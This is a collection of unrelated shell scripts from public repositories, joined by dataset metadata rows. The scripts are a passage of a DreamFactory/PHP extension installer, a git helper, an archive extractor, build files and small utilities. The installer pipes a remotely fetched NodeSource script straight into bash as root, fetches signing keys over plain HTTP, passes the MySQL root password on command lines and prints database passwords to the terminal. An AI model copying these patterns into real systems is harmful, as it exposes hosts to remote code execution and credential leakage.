read DRIVERS_PATH
if [[ -z $DRIVERS_PATH ]]
then
DRIVERS_PATH="."
fi
tar xzf $DRIVERS_PATH/ibm_data_server_driver_package_linuxx64_v11.1.tar.gz -C /opt/
if (( $? == 0 ))
then
echo -e "${GN}Drivers found.\n${NC}" >&5
apt install -y ksh
chmod +x /opt/dsdriver/installDSDriver
/usr/bin/ksh /opt/dsdriver/installDSDriver
ln -s /opt/dsdriver/include /include
git clone https://github.com/dreamfactorysoftware/PDO_IBM-1.3.4-patched.git /opt/PDO_IBM-1.3.4-patched
cd /opt/PDO_IBM-1.3.4-patched/
phpize
./configure --with-pdo-ibm=/opt/dsdriver/lib
make && make install
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not make pdo_ibm extension.${NC}" >&5
exit 1
fi
echo "extension=pdo_ibm.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pdo_ibm.ini
phpenmod -s ALL pdo_ibm
php -m | grep pdo_ibm
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pdo_ibm extension.${NC}" >&5
else
### DRIVERS FOR IBM DB2 ( ONLY WITH KEY --with-db2 )
php -m | grep -E "^ibm_db2"
if (( $? >= 1 ))
then
printf "/opt/dsdriver/ \n" | pecl install ibm_db2
if (( $? >= 1 ))
then
echo -e "${RD}\nibm_db2 extension installation error.${NC}" >&5
exit 1
fi
echo "extension=ibm_db2.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/ibm_db2.ini
phpenmod -s ALL ibm_db2
php -m | grep ibm_db2
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
fi
fi
else
echo -e "${RD}Drivers not found. Skipping...\n${NC}" >&5
fi
unset DRIVERS_PATH
cd $CURRENT_PATH
rm -rf /opt/PDO_IBM-1.3.4-patched
fi
fi
### DRIVERS FOR CASSANDRA ( ONLY WITH KEY --with-cassandra )
php -m | grep -E "^cassandra"
if (( $? >= 1 ))
then
if [[ $CASSANDRA == TRUE ]]
then
apt install -y cmake libgmp-dev
git clone https://github.com/datastax/php-driver.git /opt/cassandra
cd /opt/cassandra/
git checkout v1.3.2 && git pull origin v1.3.2
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver-dbg_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver-dev_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1-dbg_1.23.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1-dev_1.23.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1_1.23.0-1_amd64.deb
dpkg -i *.deb
if (( $? >= 1 ))
then
echo -e "${RD}\ncassandra extension installation error.${NC}" >&5
exit 1
fi
sed -i "s/7.1.99/7.2.99/" ./ext/package.xml
pecl install ./ext/package.xml
if (( $? >= 1 ))
then
echo -e "${RD}\ncassandra extension installation error.${NC}" >&5
exit 1
fi
echo "extension=cassandra.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/cassandra.ini
phpenmod -s ALL cassandra
php -m | grep cassandra
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
cd $CURRENT_PATH
rm -rf /opt/cassandra
fi
fi
### INSTALL IGBINARY EXT.
php -m | grep -E "^igbinary"
if (( $? >= 1 ))
then
pecl install igbinary
if (( $? >= 1 ))
then
echo -e "${RD}\nigbinary extension installation error.${NC}" >&5
exit 1
fi
echo "extension=igbinary.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/igbinary.ini
phpenmod -s ALL igbinary
php -m | grep igbinary
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
fi
### INSTALL PYTHON BUNCH
apt install -y python python-pip
pip list | grep bunch
if (( $? >= 1 ))
then
pip install bunch
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install python bunch extension.${NC}" >&5
fi
fi
### Install Node.js
node -v
if (( $? >= 1 ))
then
curl -sL https://deb.nodesource.com/setup_10.x | bash -
apt-get install -y nodejs
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
NODE_PATH=$(whereis node | cut -d" " -f2)
fi
### INSTALL PCS
php -m | grep -E "^pcs"
if (( $? >= 1 ))
then
pecl install pcs-1.3.3
if (( $? >= 1 ))
then
echo -e "${RD}\npcs extension installation error..${NC}" >&5
exit 1
fi
echo "extension=pcs.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pcs.ini
phpenmod -s ALL pcs
php -m | grep pcs
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pcs extension.${NC}" >&5
fi
fi
### INSTALL COUCHBASE
php -m | grep -E "^couchbase"
if (( $? >= 1 ))
then
if (( $CURRENT_OS == 16 ))
then
wget -P /tmp http://packages.couchbase.com/releases/couchbase-release/couchbase-release-1.0-4-amd64.deb
dpkg -i /tmp/couchbase-release-1.0-4-amd64.deb
elif (( $CURRENT_OS == 18 ))
then
wget -O - http://packages.couchbase.com/ubuntu/couchbase.key | apt-key add -
echo "deb http://packages.couchbase.com/ubuntu bionic bionic/main" > /etc/apt/sources.list.d/couchbase.list
fi
apt-get update
apt install -y libcouchbase-dev build-essential zlib1g-dev
pecl install couchbase
if (( $? >= 1 ))
then
echo -e "${RD}\ncouchbase extension installation error.${NC}" >&5
exit 1
fi
echo "extension=couchbase.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/xcouchbase.ini
phpenmod -s ALL xcouchbase
php -m | grep couchbase
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install couchbase extension.${NC}" >&5
fi
fi
if [[ $APACHE == TRUE ]]
then
service apache2 reload
else
service ${PHP_VERSION}-fpm reload
fi
echo -e "${GN}PHP Extensions configured.\n${NC}" >&5
### Step 5. Installing Composer
echo -e "${GN}Step 5: Installing Composer...\n${NC}" >&5
curl -sS https://getcomposer.org/installer -o /tmp/composer-setup.php
php /tmp/composer-setup.php --install-dir=/usr/local/bin --filename=composer
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}Composer installed.\n${NC}" >&5
### Step 6. Installing MySQL
if [[ $MYSQL == TRUE ]] ### Only with key --with-mysql
then
echo -e "${GN}Step 6: Installing System Database for DreamFactory...\n${NC}" >&5
dpkg -l | grep mysql | cut -d " " -f 3 | grep -E "^mysql" | grep -E -v "^mysql-client"
CHECK_MYSQL_INSTALLATION=$(echo $?)
ps aux | grep -v grep | grep -E "^mysql"
CHECK_MYSQL_PROCESS=$(echo $?)
lsof -i :3306 | grep LISTEN
CHECK_MYSQL_PORT=$(echo $?)
if (( $CHECK_MYSQL_PROCESS == 0 )) || (( $CHECK_MYSQL_INSTALLATION == 0 )) || (( $CHECK_MYSQL_PORT == 0 ))
then
echo -e "${RD}MySQL Database detected in the system. Skipping installation. \n${NC}" >&5
DB_FOUND=TRUE
else
if (( $CURRENT_OS == 16 ))
then
apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
add-apt-repository 'deb [arch=amd64,arm64,i386,ppc64el] http://mariadb.petarmaric.com/repo/10.3/ubuntu xenial main'
elif (( $CURRENT_OS == 18 ))
then
apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
add-apt-repository 'deb [arch=amd64,arm64,ppc64el] http://mariadb.petarmaric.com/repo/10.3/ubuntu bionic main'
else
echo -e "${RD} The script support only Ubuntu 16 and 18 versions. Exit.\n ${NC}" >&5
exit 1
fi
apt-get update
echo -e "${MG}Please choose a strong MySQL root user password: ${NC}" >&5
read DB_PASS
if [[ -z $DB_PASS ]]
then
until [[ ! -z $DB_PASS ]]
do
echo -e "${RD}The password can't be empty!${NC}" >&5
read DB_PASS
done
fi
echo -e "${GN}\nPassword accepted.${NC}\n" >&5
# Disable interactive mode in installation mariadb. Set generated above password.
export DEBIAN_FRONTEND="noninteractive"
debconf-set-selections <<< "mariadb-server mysql-server/root_password password $DB_PASS"
debconf-set-selections <<< "mariadb-server mysql-server/root_password_again password $DB_PASS"
apt-get install -y mariadb-server
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
service mariadb start
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not start MariaDB.. Exit ${NC}" >&5
exit 1
fi
fi
echo -e "${GN}Database for DreamFactory installed.\n${NC}" >&5
### Step 7. Configuring DreamFactory system database
echo -e "${GN}Step 7: Configure DreamFactory system database.\n${NC}" >&5
DB_INSTALLED=FALSE
# The MySQL database has already been installed, so let's configure
# the DreamFactory system database.
if [[ $DB_FOUND == TRUE ]]
then
echo -e "${MG}Is DreamFactory MySQL system database already configured? [Yy/Nn] ${NC}" >&5
read DB_ANSWER
if [[ -z $DB_ANSWER ]]
then
DB_ANSWER=Y
fi
if [[ $DB_ANSWER =~ ^[Yy]$ ]]
then
DB_INSTALLED=TRUE
# MySQL system database is not installed, but MySQL is, so let's
# prompt the user for the root password.
else
echo -e "\n${MG}Enter MySQL root password: ${NC} " >&5
read DB_PASS
# Test DB access
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? >= 1 ))
then
ACCESS=FALSE
TRYS=0
until [[ $ACCESS == TRUE ]]
do
echo -e "${RD}\nPassword incorrect!\n ${NC}" >&5
echo -e "${MG}Enter root user password:\n ${NC}" >&5
read DB_PASS
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? == 0 ))
then
ACCESS=TRUE
fi
TRYS=$((TRYS + 1))
if (( $TRYS == 3 ))
then
echo -e "\n${RD}Exit.\n${NC}" >&5
exit 1
fi
done
fi
fi
fi
# If the DreamFactory system database not already installed,
# let's install it.
if [[ $DB_INSTALLED == FALSE ]]
then
# Test DB access
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? >= 1 ))
then
echo -e "${RD}Connection to Database failed. Exit \n${NC}" >&5
exit 1
fi
echo -e "\n${MG}What would you like to name your system database? (e.g. dreamfactory) ${NC}" >&5
read DF_SYSTEM_DB
if [[ -z $DF_SYSTEM_DB ]]
then
until [[ ! -z $DF_SYSTEM_DB ]]
do
echo -e "\n${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB
done
fi
echo "CREATE DATABASE ${DF_SYSTEM_DB};" | mysql -u root -p${DB_PASS} 2>&5
if (( $? >= 1 ))
then
echo -e "\n${RD}Creating database error. Exit${NC}" >&5
exit 1
fi
echo -e "\n${MG}Please create a MySQL DreamFactory system database user name (e.g. dfadmin): ${NC}" >&5
read DF_SYSTEM_DB_USER
if [[ -z $DF_SYSTEM_DB_USER ]]
then
until [[ ! -z $DF_SYSTEM_DB_USER ]]
do
echo -e "${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB_USER
done
fi
echo -e "\n${MG}Please create a secure MySQL DreamFactory system database user password: ${NC}" >&5
read DF_SYSTEM_DB_PASSWORD
if [[ -z $DF_SYSTEM_DB_PASSWORD ]]
then
until [[ ! -z $DF_SYSTEM_DB_PASSWORD ]]
do
echo -e "${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB_PASSWORD
done
fi
# Generate password for user in DB
echo "GRANT ALL PRIVILEGES ON ${DF_SYSTEM_DB}.* to \"${DF_SYSTEM_DB_USER}\"@\"localhost\" IDENTIFIED BY \"${DF_SYSTEM_DB_PASSWORD}\";" | mysql -u root -p${DB_PASS} 2>&5
if (( $? >= 1 ))
then
echo -e "\n${RD}Creating new user error. Exit${NC}" >&5
exit 1
fi
echo "FLUSH PRIVILEGES;" | mysql -u root -p${DB_PASS}
echo -e "\n${GN}Database configuration finished.\n${NC}" >&5
else
echo -e "${GN}Skipping...\n${NC}" >&5
fi
else
echo -e "${GN}Step 6: Skipping DreamFactory system database installation.\n" >&5
echo -e "Step 7: Skipping DreamFactory system database configuration.\n${NC}" >&5
fi
### Step 8. Install DreamFactory
echo -e "${GN}Step 8: Installing DreamFactory...\n ${NC}" >&5
ls -d /opt/dreamfactory
if (( $? >= 1 ))
then
mkdir -p /opt/dreamfactory
git clone -b 3.0-beta https://github.com/dreamfactorysoftware/dreamfactory.git /opt/dreamfactory
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not clone DreamFactory repository. Exiting. ${NC}" >&5
exit 1
fi
DF_CLEAN_INSTALLATION=TRUE
else
echo -e "${RD}DreamFactory detected.\n${NC}" >&5
DF_CLEAN_INSTALLATION=FALSE
fi
if [[ $DF_CLEAN_INSTALLATION == FALSE ]]
then
ls /opt/dreamfactory/composer.{json,lock,json-dist}
if (( $? == 0 ))
then
echo -e "${RD}Would you like to upgrade your instance? [Yy/Nn]${NC}" >&5
read LICENSE_FILE_ANSWER
if [[ -z $LICENSE_FILE_ANSWER ]]
then
LICENSE_FILE_ANSWER=N
fi
LICENSE_FILE_EXIST=TRUE
fi
fi
if [[ $LICENSE_FILE_EXIST == TRUE ]]
then
if [[ $LICENSE_FILE_ANSWER =~ ^[Yy]$ ]]
then
echo -e "${MG}\nEnter path to license files: [./]${NC}" >&5
read LICENSE_PATH
if [[ -z $LICENSE_PATH ]]
then
LICENSE_PATH="."
fi
ls $LICENSE_PATH/composer.{json,lock,json-dist}
if (( $? >= 1 ))
then
echo -e "${RD}\nLicenses not found. Skipping.\n${NC}" >&5
else
cp $LICENSE_PATH/composer.{json,lock,json-dist} /opt/dreamfactory/
LICENSE_INSTALLED=TRUE
echo -e "\n${GN}Licenses file installed. ${NC}\n" >&5
echo -e "${GN}Installing DreamFactory...\n${NC}" >&5
fi
else
echo -e "\n${RD}Skipping...\n${NC}" >&5
fi
else
echo -e "${MG}Do you have a commercial DreamFactory license? [Yy/Nn]${NC} " >&5
read LICENSE_FILE_ANSWER
if [[ -z $LICENSE_FILE_ANSWER ]]
then
LICENSE_FILE_ANSWER=N
fi
if [[ $LICENSE_FILE_ANSWER =~ ^[Yy]$ ]]
then
echo -e "${MG}\nEnter path to license files: [./]${NC}" >&5
read LICENSE_PATH
if [[ -z $LICENSE_PATH ]]
then
LICENSE_PATH="."
fi
ls $LICENSE_PATH/composer.{json,lock,json-dist}
if (( $? >= 1 ))
then
echo -e "${RD}\nLicenses not found. Skipping.\n${NC}" >&5
echo -e "${RD}Installing DreamFactory OSS version...\n${NC}" >&5
else
cp $LICENSE_PATH/composer.{json,lock,json-dist} /opt/dreamfactory/
LICENSE_INSTALLED=TRUE
echo -e "\n${GN}Licenses file installed. ${NC}\n" >&5
echo -e "${GN}Installing DreamFactory...\n${NC}" >&5
fi
else
echo -e "\n${RD}Installing DreamFactory OSS version.\n${NC}" >&5
fi
fi
chown -R $CURRENT_USER /opt/dreamfactory && cd /opt/dreamfactory
# If Oracle is not installed, add the --ignore-platform-reqs option
# to composer command
if [[ $ORACLE == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "/usr/local/bin/composer install --no-dev"
else
sudo -u $CURRENT_USER bash -c "/usr/local/bin/composer install --no-dev --ignore-platform-reqs"
fi
### Shutdown silent mode because php artisan df:setup and df:env will get troubles with prompts.
exec 1>&5 5>&-
if [[ $DB_INSTALLED == FALSE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:env -q \
--db_connection=mysql \
--db_host=127.0.0.1 \
--db_port=3306 \
--db_database=$(echo $DF_SYSTEM_DB) \
--db_username=$(echo $DF_SYSTEM_DB_USER) \
--db_password=$(echo $DF_SYSTEM_DB_PASSWORD | sed 's/['\'']//g')"
sed -i 's/\#DB\_CHARSET\=/DB\_CHARSET\=utf8/g' .env
sed -i 's/\#DB\_COLLATION\=/DB\_COLLATION\=utf8\_unicode\_ci/g' .env
echo -e "\n"
MYSQL_INSTALLED=TRUE
elif [[ ! $MYSQL == TRUE && $DF_CLEAN_INSTALLATION == TRUE ]] || [[ $DB_INSTALLED == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:env"
if [[ $DB_INSTALLED == TRUE ]]
then
sed -i 's/\#DB\_CHARSET\=/DB\_CHARSET\=utf8/g' .env
sed -i 's/\#DB\_COLLATION\=/DB\_COLLATION\=utf8\_unicode\_ci/g' .env
fi
fi
if [[ $DF_CLEAN_INSTALLATION == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:setup"
fi
if [[ $LICENSE_INSTALLED == TRUE || $DF_CLEAN_INSTALLATION == FALSE ]]
then
php artisan migrate --seed
sudo -u $CURRENT_USER bash -c "php artisan config:clear -q"
if [[ $LICENSE_INSTALLED == TRUE ]]
then
grep DF_LICENSE_KEY .env > /dev/null 2>&1 # Check for existing key.
if (( $? == 0 ))
then
echo -e "\n${RD}The license key already installed. Are you want to install a new key? [Yy/Nn]${NC}"
read KEY_ANSWER
if [[ -z $KEY_ANSWER ]]
then
KEY_ANSWER=N
fi
NEW_KEY=TRUE
fi
if [[ $NEW_KEY == TRUE ]]
then
if [[ $KEY_ANSWER =~ ^[Yy]$ ]] #Install new key
then
CURRENT_KEY=$(grep DF_LICENSE_KEY .env)
echo -e "${MG}\nPlease provide your new license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
if [[ -z $LICENSE_KEY ]]
then
until [[ ! -z $LICENSE_KEY ]]
do
echo -e "${RD}\nThe field can't be empty!${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
elif (( $size != 32 ))
then
until (( $size == 32 ))
do
echo -e "${RD}\nInvalid License Key provided${NC}"
echo -e "${MG}\nPlease provide your license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
fi
###Change license key in .env file
sed -i "s/$CURRENT_KEY/DF_LICENSE_KEY=$LICENSE_KEY/" .env
else
echo -e "${RD}\nSkipping...${NC}" #Skip if key found in .env file and no need to update
fi
else
echo -e "${MG}\nPlease provide your license key:${NC}" #Install key if not found existing key.
read LICENSE_KEY
size=${#LICENSE_KEY}
if [[ -z $LICENSE_KEY ]]
then
until [[ ! -z $LICENSE_KEY ]]
do
echo -e "${RD}The field can't be empty!${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
elif (( $size != 32 ))
then
until (( $size == 32 ))
do
echo -e "${RD}\nInvalid License Key provided${NC}"
echo -e "${MG}\nPlease provide your license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
fi
###Add license key to .env file
echo -e "\nDF_LICENSE_KEY=${LICENSE_KEY}" >> .env
fi
fi
fi
chmod -R 2775 /opt/dreamfactory/
chown -R www-data:$CURRENT_USER /opt/dreamfactory/
### Uncomment nodejs in .env file
grep -E "^#DF_NODEJS_PATH" .env > /dev/null
if (( $? == 0 ))
then
sed -i "s,\#DF_NODEJS_PATH=/usr/local/bin/node,DF_NODEJS_PATH=$NODE_PATH," .env
fi
sudo -u $CURRENT_USER bash -c "php artisan cache:clear -q"
echo -e "\n${GN}Installation finished! ${NC}"
if [[ $DEBUG == TRUE ]]
then
echo -e "\n${RD}The log file saved in: /tmp/dreamfactory_installer.log ${NC}"
fi
### Summary table
if [[ $MYSQL_INSTALLED == TRUE ]]
then
echo -e "\n "
echo -e "${MG}******************************"
echo -e " DB for system table: mysql "
echo -e " DB host: 127.0.0.1 "
echo -e " DB port: 3306 "
if [[ ! $DB_FOUND == TRUE ]]
then
echo -e " DB root password: $DB_PASS"
fi
echo -e " DB name: $(echo $DF_SYSTEM_DB) "
echo -e " DB user: $(echo $DF_SYSTEM_DB_USER)"
echo -e " DB password: $(echo $DF_SYSTEM_DB_PASSWORD)"
echo -e "******************************${NC}\n"
fi
exit 0
| true |
9de9b132931119d1bb8da0a1b1a63019e7a25ee9 | Shell | jeremybobbin/thunpren | /5/watchfor | UTF-8 | 168 | 3.328125 | 3 | [] | no_license | #!/bin/sh
case $# in
0) echo 'Usage: watchfor person [person [person [...]]]'
esac
people=`echo $* | sed 's/ /|/g'`
until who | egrep "$people"
do
sleep 60
done
| true |
2be45c8287770546d997b658d2c976ff8845695e | Shell | KoharaKazuya/dotfiles | /bin/git-checkout-issue | UTF-8 | 695 | 3.84375 | 4 | [] | no_license | #!/bin/sh
set -eu
# 引数の数チェック
[ "$#" -eq 1 ]
# 引数が数値かどうかチェック
expr "$1" + 1 1> /dev/null 2>&1
[ "$1" -gt 0 ] 1> /dev/null 2>&1
# 未コミットの変更ファイルがあれば終了
git _modified-files-guard
# ソースの最新化
git cc
# 指定ブランチが既に存在するか確認する
branch_name="issue/#$1"
if git rev-parse "$branch_name" 1> /dev/null 2>&1; then
# 警告を出してチェックアウト
printf "\e[0;33mwarning: A branch named '%s' already exists.\n" "$branch_name" 1>&2
git co "$branch_name"
else
# issue ブランチの作成
git _processing 'coi' "Creating branch $branch_name" git cob "$branch_name"
fi
| true |
1e75ffd364fb19aef6ce7ce8ec4e9238ce641ea4 | Shell | Antynea/raspi-overlayroot | /initcpio-install-overlayroot | UTF-8 | 120 | 2.578125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/bash
build() {
add_runscript
}
help() {
echo "This hook overlays a tmpfs on top of a readonly root."
}
| true |
d8593fcd4fff47f898d537d6de8f843a8871191c | Shell | wafflesnatcha/bin | /extract.sh | UTF-8 | 1,263 | 4.3125 | 4 | [] | no_license | #!/usr/bin/env bash
# `extract.sh` by Scott Buchanan <http://wafflesnatcha.github.com>
SCRIPT_NAME="extract.sh"
SCRIPT_VERSION="r2 2012-09-10"
usage() { cat <<EOF
$SCRIPT_NAME $SCRIPT_VERSION
Automatically extract compressed files of various types.
Usage: ${0##*/} FILE...
EOF
}
ERROR() { [[ $1 ]] && echo "$SCRIPT_NAME: $1" 1>&2; [[ $2 > -1 ]] && exit $2; }
while (($#)); do
case $1 in
-h|--help) usage; exit 0 ;;
--) shift; break ;;
-*|--*) ERROR "unknown option ${1}" 1 ;;
*) break ;;
esac
shift
done
[[ ! "$1" ]] && { usage; exit 0; }
for f in "$@"; do
[[ ! -f "$f" ]] && continue
case "$(echo $f | tr '[A-Z]' '[a-z]')" in
*.tar.bz2|*.tbz2|*.tbz)
tar -xjvpf "$f"
;;
*.tar.gz|*.tgz)
tar -xzvpf "$f"
;;
*.tar.xz|*.txz)
tar -xvpf "$f"
;;
*.7z)
bin=$(which 7z 7zr 2>/dev/null | head -n1)
[[ ! $bin ]] && ERROR "couldn't find path to 7z or 7zr" 3
"$bin" x "$f"
;;
*.bz2|*.bzip2|*.bz)
bzip2 -dkv "$f"
;;
*.cpio)
ditto -x "$f" "${f%%.cpio}"
;;
*.cpgz)
ditto -Vxz "$f" "${f%%.cpgz}"
;;
*.gz|*.gzip)
gzip -d "$f"
;;
*.rar)
unrar x "$f"
;;
*.xar)
xar -d "$f"
;;
*.xz)
xz -dv "$f"
;;
*.zip|*.z01)
unzip "$f"
;;
*) ERROR "don't know how to handle '$f'" 2 ;;
esac
done
| true |
b2bafb3249c6277d6123207dc1281904af39a2aa | Shell | kozross/rocm-arch | /rocm-cmake/PKGBUILD | UTF-8 | 680 | 2.59375 | 3 | [] | no_license | # Original build: fermyon <antifermion@protonmail.com>
# Maintainer: Markus Näther <naetherm@cs.uni-freiburg.de>
pkgname=rocm-cmake
pkgver=3.3.0
pkgrel=1
pkgdesc="cmake modules for common build tasks needed for the ROCM software stack"
arch=('x86_64')
url="https://github.com/RadeonOpenCompute/rocm-cmake"
license=('MIT')
makedepends=('cmake')
source=("https://github.com/RadeonOpenCompute/rocm-cmake/archive/rocm-$pkgver.tar.gz")
sha256sums=('76ed3ee8e56cf3246011cf7723c2abda539e1136e7e7f6909bfa45d268b8644f')
build() {
mkdir -p "$srcdir/build"
cd "$srcdir/build"
cmake -DCMAKE_INSTALL_PREFIX=/opt/rocm \
"$srcdir/$pkgname-rocm-$pkgver"
}
package() {
cd "$srcdir/build"
make DESTDIR="$pkgdir" install
}
| true |
02cd8732eb3e2f12b70026b2c236ac1620f77825 | Shell | hastly/dev_dough | /start.sh | UTF-8 | 137 | 2.734375 | 3 | [] | no_license | if hash docker-compose 2>/dev/null; then
docker-compose up -d
else
echo Docker compose is not found. Please install docker first.
fi
| true |
21b6a2e34970ac6e8b7e16018a8e76c6c649f668 | Shell | mpromonet/rpi | /gpio/mcp23008 | UTF-8 | 1,198 | 3.75 | 4 | [] | no_license | #! /bin/sh
### BEGIN INIT INFO
# Provides: gpio-mcp23008
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop:
# Short-Description: creates MCP23008 device
### END INIT INFO
. /lib/lsb/init-functions
case $1 in
start)
echo "start gpio-mcp23008"
insmod /lib/modules/$(uname -r)/extra/gpio-mcp23008.ko p_base=128
if [ ! -d /sys/class/i2c-dev/i2c-0/device/0-0020/ ]
then
echo "New I2C device MCP23008"
echo "mcp23008 0x20" > /sys/class/i2c-dev/i2c-0/device/new_device
fi
if [ -d /sys/class/gpio/gpiochip128 ]
then
echo "GPIO interface OK"
else
echo "GPIO interface failed"
fi
;;
stop)
echo "stop gpio-mcp23008"
if [ -d /sys/class/i2c-dev/i2c-0/device/0-0020/ ]
then
find /sys/class/i2c-dev/i2c-0/device/0-0020/gpio -name "gpio[0-9]*" -print | sed 's/.*gpio//' | while read gpio
do
echo "Unexport GPIO $gpio"
echo $gpio > /sys/class/gpio/unexport
done
echo "Delete I2C device MCP23008"
echo "0x20" > /sys/class/i2c-dev/i2c-0/device/delete_device
fi
rmmod gpio-mcp23008.ko
;;
*)
echo "usage: $0 {start|stop}"
esac
| true |
0b1e663e9318771076dc6438b890ace849541d5d | Shell | alegemaate/QIES | /frontend/tests/rename_files.sh | UTF-8 | 302 | 4 | 4 | [] | no_license | #!/bin/bash
# Counter
changed=0
# Ensure arguments exist
if [ $# -eq 2 ]; then
for line in $(find . -iname $1); do
DIR=$(dirname "${line}")
mv "$line" "${DIR}/${2}"
changed=$((changed+1))
done
else
echo "Arguments must be old file name and new file name"
fi
echo "${changed} files changed." | true |
05b558ca512526871d0f1ac748c4e5b78f474fdc | Shell | xiongyihui/wav-aec | /run-wav-ns.sh | UTF-8 | 437 | 3.21875 | 3 | [] | no_license | #!/bin/bash
if [ "$#" -ne 5 ]; then
echo "Usage $(basename "$0") <in.wav> <channel> <out.wav> <in_rate> <out_rate>"
exit 1
fi
in_sr="$4"
out_sr="$5"
builddir="${BASH_SOURCE[0]%/*}/build"
"$builddir/webrtc-audioproc" -filter_ns -ns_level 3 -in_sr "$in_sr" -out_sr "$out_sr" -near_in <(exec sox -DR "$1" -r $in_sr -t raw -e signed-integer -b 16 - remix "$2") -near_out >(exec sox -DR -r $out_sr -t raw -e signed-integer -b 16 - "$3")
| true |
68c66726e9877dc2201296417c21ebd7a66cf9e6 | Shell | Jvlythical/ECS40 | /hw3/hw3-self/backup/grade.sh | UTF-8 | 1,221 | 3.953125 | 4 | [] | no_license | #!/bin/bash
# Usage:
#
# sh ./grade.sh ~/project
#
# where 'project' is the directory containing your source (mscp.cpp etc.)
if [ "$#" -ne 1 ]; then
echo "Usage: $0 directory" >&2
echo " (directory should contain your mscp.cpp etc.)" >& 2
exit 1
fi
TIMEOUT=60s
rm -f *.o mscp mscp.reference ref.out
gcc -w -c time.c -o time.o
if g++ -Wall -Werror -ansi -Xlinker --wrap=time -I$1 $1/*.cpp time.o -o mscp;
then
echo "Compile succeeded without warnings"
elif g++ -ansi -Xlinker --wrap=time -I$1 $1/*.cpp time.o -o mscp;
then
echo "Compile succeeded with warnings"
else
echo "Compile failed"
exit 1
fi
gcc -w -c reference.c -o reference.o
gcc -Xlinker --wrap=time reference.o time.o -o mscp.reference
./mscp.reference < input > ref.out
timeout -k $TIMEOUT $TIMEOUT ./mscp < input > out
if cmp -s ref.out out;
then
echo "Output matches reference (cmp byte-by-byte comparison)"
elif diff -q ref.out out > /dev/null;
then
echo "Output matches reference (diff comparison)"
elif diff -q -w -i -E -B -t ref.out out > /dev/null;
then
echo 'Output matches reference ignoring whitespace (diff comparison)'
else
echo 'Output does NOT match'
echo "Look at 'out' and 'ref.out' for more information"
fi
| true |
caaf99b5ad6e30dfc758dcfc0ce10692e78d4807 | Shell | freebsd/freebsd-ports | /www/sahi/files/sahi.sh.in | UTF-8 | 502 | 3 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
if [ ! -d ${HOME}/.sahi ] && [ -z "${SAHI_USERDATA_DIR}" ]; then
cp -r %%DATADIR%%/userdata ${HOME}/.sahi
chmod u+w ${HOME}/.sahi/config/*
export SAHI_USERDATA_DIR=${HOME}/.sahi
fi
if [ -z "${BROWSER}" ]; then
export BROWSER=%%BROWSER%%
fi
if [ -z "${http_proxy}" ]; then
export http_proxy=http://localhost:9999
fi
if [ -z "${SAHI_USERDATA_DIR}" ]; then
export SAHI_USERDATA_DIR=${HOME}/.sahi
fi
exec /usr/bin/env JAVA_HOME=%%JAVA_HOME%% ${SAHI_USERDATA_DIR}/bin/start_dashboard.sh
| true |
a708e893754961c241045641d7f34dcec94667a1 | Shell | foolean/pxe | /tools/get_openbsd_netboot | UTF-8 | 7,471 | 4.03125 | 4 | [] | no_license | #!/bin/bash
#
# FILENAME: get_openbsd_netboot
# AUTHOR: Bennett Samowich <bennett@foolean.org>
# DATE: 2012-04-19
#
# DESCRIPTION:
# Download OpenBSD netboot images. The script will always download the
# current active netboot images. Running this script from cron(1) will
# ensure that your netboot images are always current, including the new
# releases as they are made available.
#
# This script will also create a 'etc' directory within directory of each
